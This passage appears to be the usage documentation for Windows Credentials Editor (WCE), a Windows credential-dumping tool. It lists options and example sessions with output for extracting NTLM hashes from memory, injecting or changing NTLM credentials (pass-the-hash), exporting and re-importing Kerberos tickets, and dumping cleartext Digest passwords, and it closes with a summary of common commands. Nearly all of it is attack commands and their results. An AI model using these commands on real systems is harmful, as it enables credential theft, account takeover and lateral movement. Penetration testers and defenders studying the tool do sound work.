-f Force 'safe mode'.
-g Generate LM & NT Hash.
-K Dump Kerberos tickets to file (unix & 'windows wce' format)
-k Read Kerberos tickets from file and insert into Windows cache
-w Dump cleartext passwords stored by the digest authentication package
-v Verbose output.
Examples:
* List current logon sessions
C:\>wce -l
meme:meme:11111111111111111111111111111111:11111111111111111111111111111111
* List current logon sessions with verbose output enabled
C:\>wce -l -v
Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
LUID:000003E4h
\:NTLM
LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
LUID:000003E7h
00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111
* Change NTLM credentials associated with current logon session
C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!
* Add/Change NTLM credentials of a logon session (not the current one)
C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!
* Delete NTLM credentials associated with a logon session
C:\>wce -d 3e5
NTLM credentials successfully deleted!
* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.
C:\>wce -e
* Run WCE indefinitely, waiting for new credentials/logon sessions
Refresh is every 5 seconds by default.
C:\>wce -r
* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)
C:\>wce -r5
* Generate LM & NT Hash.
C:\>wce -g test
Password: test
Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
* Dump Kerberos tickets to file (unix & 'windows wce' format)
C:\>wce -K
Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!
* Read Kerberos tickets from file and insert into Windows cache
C:\>wce -k
Reading kerberos tickets from file 'wce_krbtkts'...
5 kerberos tickets were added to the cache.
Done!
* Dump cleartext passwords stored by the Digest Authentication package
C:\>wce -w
test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test
GETLSASRVADDR.EXE
-----------------
This tool automatically obtains the addresses WCE needs in order to read
logon sessions and NTLM credentials from memory.
The addresses it reports can then be passed to WCE with the -A switch.
This tool requires the DLLs symsrv.dll and dbghelp.dll, available from the
"Debugging Tools for Windows" package.
Additional Information
----------------------
* http://www.ampliasecurity.com/research.html
* http://www.ampliasecurity.com/research/wcefaq.html
* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A summary of the commonly used commands
【list NTLM credentials in memory】
wce.exe
wce.exe -o output.txt
【dump logon cleartext passwords】
wce.exe -w
【change my current NTLM credentials】
wce.exe -s :::
【create a new logon session and launch a program with new NTLM credentials】
【generate NTLM hashes】
wce.exe -g
【Safe mode (no injection)】
wce.exe -f